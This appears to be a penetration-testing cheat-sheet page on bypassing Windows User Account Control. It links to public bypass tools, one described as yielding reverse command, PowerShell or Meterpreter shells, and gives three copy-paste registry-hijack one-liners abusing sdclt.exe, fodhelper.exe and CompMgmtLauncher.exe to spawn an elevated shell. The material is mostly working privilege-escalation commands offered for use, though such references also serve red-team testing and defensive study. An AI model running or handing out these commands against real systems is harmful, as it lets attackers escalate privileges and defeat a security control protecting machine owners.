Skip to content

UAC Bypass

UAC Bypass

https://github.com/hfiref0x/UACME

TpmInitUACBypass Bypass User Account Control (UAC), to get a High Integrity (or SYSTEM) Reversed Command shell, a reversed PowerShell session, or a Reversed Meterpreter session.

[TpmInitUACAnniversaryBypass(https://github.com/Cn33liz/TpmInitUACAnniversaryBypass) Same as above, only works on Windows 10 x64 with the Anniversary Update applied (Version 1607).

UAC bypass for Win10 - control.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

UAC bypass for Win10 - fodhelper.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

UAC bypass for ⅞/10 - CompMgmtLauncher.exe

reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f